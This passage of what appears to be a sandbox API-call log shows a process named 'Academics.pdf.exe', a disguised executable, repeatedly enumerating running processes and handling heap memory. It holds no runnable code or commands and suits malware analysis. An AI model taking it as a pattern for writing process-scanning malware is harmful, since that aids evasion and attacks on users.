lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0314.325] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.326] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0314.326] CloseHandle (hObject=0x294) returned 1 [0314.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0314.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0314.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0314.327] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0314.327] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0314.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0314.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0314.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0314.329] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.329] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0314.330] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0314.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0314.332] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0314.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0314.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0314.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0314.335] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.336] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.336] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.337] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.338] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.338] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0314.339] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.339] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0314.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0314.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0314.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0314.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0314.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0314.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0314.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0314.346] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0314.346] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0314.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0314.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0314.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0314.349] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0314.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0314.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0314.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0314.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0314.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0314.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0314.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0314.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0314.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0314.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0314.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0314.362] CloseHandle (hObject=0x294) returned 1 [0314.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0314.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0314.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0314.363] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0314.363] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0314.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0314.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0314.365] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0314.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0314.367] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0314.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0314.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0314.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0314.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0314.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.377] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0314.378] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.379] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.380] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0314.380] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0314.381] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0314.382] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0314.383] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 